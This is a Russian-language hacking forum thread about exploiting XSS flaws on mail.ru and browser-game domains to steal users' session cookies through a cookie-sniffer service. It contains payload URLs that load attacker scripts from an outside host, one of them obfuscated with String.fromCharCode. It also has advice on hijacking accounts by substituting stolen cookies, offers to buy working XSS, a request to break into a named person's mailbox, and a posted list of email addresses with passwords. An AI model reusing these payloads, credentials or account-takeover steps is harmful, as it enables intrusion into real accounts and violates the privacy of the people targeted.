А как пользоваться XSS (а так же что в неё вставлять (я про XSS, помни!)) расскажет M@ZAX@KEP с его темой по XSS (https://hpc.name/showthread.php?t=13808) (я уже сбился со счету - сколько раз я эту тему рекламирую). Вот неужели так трудно иногда забивать в поиск по сайту свой вопрос? А в гугле вообще 90% ответов и XSS там точно есть.

есть сниффер как с него пасивный вытянуть помогите пожалуйста.

а если поменять
code:

w4.dwar.mail.ru

на mail.ru, куки будут ?приходить?

Цитата:

Сообщение от vikktor71

"' width='0' height='0' style='display:none'>

Это типа попытка взлома сайта?

"' width='0' height='0' style='display:none'>

слушай, ничего подобного у это на работает!!! как нормальную ссылку сделать?

Спасибо большое!

Я тут новичок.. И могли бы вы мне сделать это за +.Если да пишите в скайп ayan.ginet

ннихрена не работает

Неактуально закройте или удалите эту тему! Пасивки есть в дргой теме!
Тыц (https://hpc.name/showthread.php?t=22057)

Эта пассивка уже с февраля не работает, хватит тут кричать.

Цитата:

Цитата:


Сообщение от vikktor71
"' width='0' height='0' style='display:none'>



Это типа попытка взлома сайта?



пахахахахаха)))))
Народ, выложилиб лучше новую пассивку, хватит фигней страдать, эта пассивка уже пофиксина, они всего лишь живут по 3-4 дня, если не меньше!

извините за то что пишу не в ту тему нооо..
у меня не выходит посмотреть сниффер..
хоть я уже зарегистрировался((
помогите пожалуйста я уже не знаю что делать ((

http://w4.dwar.m0il.ru/register.php?referrer="> не понял почему так

Not Found

The requested URL /*register.php was not found on this server.
Apache Server at w4.dwar.mail.ru Port 80
чо делать

Эту XSS уже давно прикрыли. Но я успел ей воспользоваться.)))

блин чё мне не приходит кукис на почту

не приходят на сниффер кукис помогите плиз!!!!!

не решился вопрос

де взять пассивку?

Народ! у Мя Проблемка!

Помогите я сделал ссылку но мне на снифер ничево не приходить http://w4.dwar.mail.ru/register.php#?referrer=">%3CSCRIPT type=text/javascript src=http://httpz.ru/qldx6p2ivlgo.js>"

люди помогите во благо моей семье, мне надо сломать мыло и узнать почту одного человека, есть подозрение в изменах моей жены.. кто нить взломайте мне мыло и пришлите его данные пароль на мыло пожалуйста, только во благо семьи, вот его мыло goshuk@bk.ru

пишите мне если что сюда или на мыло dpoh12@ukr.net

Куплю XSS (актив или пассив) на mail.ru и yandex.ru. Прошу не беспокоить самых умных, решивших кинуть на деньги без XSS, не прокатит.. Кто готов продать XSS ( для личного пользования, а не распространения ) писать на xbuyerss@mail.ru О цене договоримся.

Цитата:

Сообщение от atom499

Куплю XSS (актив или пассив) на mail.ru и yandex.ru. Прошу не беспокоить самых умных, решивших кинуть на деньги без XSS, не прокатит.. Кто готов продать XSS ( для личного пользования, а не распространения ) писать на xbuyerss@mail.ru О цене договоримся.

Сомневаюсь что тебе кто то продаст в личное пользование,только тебе одному.Этап пройденный!Если и продадут и по обещают что только ты один им будешь пользоваться ,но сдерут с тебя кругленькую сумму. При этом тебе продавец гарантий не даст что другому он не продаст так же как и тебе в одни руки. 2 дня,ну максимум 4 дня и прикроют активку!Я покупал уже не раз в одни руки для себя ,больше 5 дней не держалась.Совет,научись сам искать xss ,а если нет мозгов то завязывай с покупками,больше разоришься!Я завязал,пользуюсь фейками,мне хватает!

ко мне на лог куки совсем не приходит,и реферер тоже,пробывал сделать все что там написано,help

мне самое главное хотя бы мыло научиться взламывать

когда копируешь код из сниффера пробелы убирать?

я все сделал вставил скрипт из сниффера пасивку которая была в коментак а на снифф нечего не приходит
может пасивка своя нужна? помогите плиз

Цитата:

Сообщение от slam-hack

я все сделал вставил скрипт из сниффера пасивку которая была в коментак а на снифф нечего не приходит
может пасивка своя нужна? помогите плиз

Потому что пассивка уже не актуальна , нужно купить новую или найти самому.

ничего не получается

Цитата:

Сообщение от tickhack

Потому что пассивка уже не актуальна , нужно купить новую или найти самому.

а как ее найти?

Цитата:

Сообщение от 1Nytu

а как ее найти?

Искать ошибки в фильтрациях

Запрашиваемая страница / * register.php не найдена на этом сервере.)че за х.... подскажи пожалуста

Её уже прикрыли, хватит флудить

первый раз пробую утащить куки мыла. Я так понял пассивка с первой страницы не пашет? Одолжите пжалста свежанькаю?

а можно сделать так не для майла,а для игры одной?(браезерной)

Цитата:

Сообщение от Nextbn

а можно сделать так не для майла,а для игры одной?(браезерной)

Да конечно , с помощью xss можно взломать все где можно регистрироваться.

Дайте пассивку на warface плиз, ну или просто на мыло. Только свеженькую, а то на 1 странице пассивку уже прикрыли...

Помогите найти XSS для сайта heroeswm.ru

тебе пароль не придет тебе придет куки теперь надо поменять свои куки на те что пришли и ты будешь сидеть за него на мире либо читать почту но не будешь знать его пароль

Скажи пожалуйста, а после того как жертва перейдёт по ссылки где куда приходит куки? ну смысле где их посмотреть?

https://hpc.name/sniffer/

бля я не понел куда вставлять... та чтоли

http://mail.ru/register.php?referrer=">

отправляем знакомому
Цитата:


в хроме не работает, попробуй в фаерфоксе http://clck.ru/8i7EY (https://hpc.name/redirector.html#http://clck.ru/8i7EY) тут пейджилка страниц внизу красивая



пассивная XSS на переходе по страницам, тока в хроме работает

code:

http://w1.riot.mail.ru/info/news/?id=84&show=news'%20onmouseover%3deval(String.fromCharCod e(106,97,118,97,115,99,114,105,112,116,58,100,111, 99,117,109,101,110,116,46,119,114,105,116,101,40,3 9,60,83,67,82,73,80,84,32,116,121,112,101,61,116,1 01,120,116,47,106,97,118,97,115,99,114,105,112,116 ,32,115,114,99,61,104,116,116,112,58,47,47,104,116 ,116,112,122,46,114,117,47,48,49,101,108,122,54,11 2,50,103,118,103,111,46,106,115,62,60,47,83,67,82, 73,80,84,62,34,39,41))%20bad%3d'

mail.ru узявимо поле название при создании новой папки
alert(45)
сначала включить настройку
Настройки => Пароль и безопасность => Поставить галочку "Сохранять и отображать последние действия в ящике"
затем создать новую папку с именем alert(45)
перейти https://e.mail.ru/settings/security (https://hpc.name/redirector.html#https://e.mail.ru/settings/security)

Ребят подскажите?делаю все как надо но почему жи куки не приходят?

Цитата:

Сообщение от Mysterio

Ребят подскажите?делаю все как надо но почему жи куки не приходят?

Ты сидишь на перевёрнутом еже повёрнутом на запад, а малина фиолетовая.
Какой вопрос, такой ответ.

Ребят делаю всё как надо но кукисы не приходят(((

Цитата:

Сообщение от Mysterio

Ребят делаю всё как надо но кукисы не приходят(((

Да ты объясни что в твоём понимании "как надо", а то что-то не сильно третий глаз работает - надо в СЦ сносить, может поменяют по гарантии, как думаешь?

Делаю всё как здесь написано,но куки не приходят почему то(

Отдам в одни руки, бесплатно, в обмен на докрутку. XSS на сервисах мейл, дёргает мпоп, отдам тому, кто поможет докрутить, т.к. сейчас требуеться сдсц от самого e*mail*ru . И без него доступны все сервисы, включая мейл деньги, но мой мир и почта недоступны. Лавочку прикрыли недавно. Прошу писать тех, кто понимает вышеописанное. Первое общение- ЛС.

А как подставить куки? Извините за тупость. Нуб в этом.

Цитата:

Сообщение от ciplenok57

А как подставить куки? Извините за тупость. Нуб в этом

В опере - инструменты - дополнительно - управление cookies - дальше поймёшь.

Цитата:

Сообщение от kkoott

дальше поймёшь.

Ты уверен?

240180@mail.ru;123456
220282@mail.ru;123456
190483@mail.ru;123456
030290@mail.ru;123456
cn.hf@mail.ru;123456
nfif@mail.ru;123456
1nf0@mail.ru;123456
3edc@mail.ru;123456
abdeel@mail.ru;123456
acromegalia@mail.ru;123456
adductus@mail.ru;123456
Вот вам, получили!?

делаю всё правильно не получаеться переходит по сайту а куки не приходит вот у вас так %3CSCRIPT а у меня он так отображаеться <SCRIPT почему?

Сейчас это не работает

Цитата:

Сообщение от Ower_oringe

Сейчас это не работает

именно показанная здесь хсс уже не работает,
а вот взлом меил.ру с помощью хсс(рабочей) очень даже работает!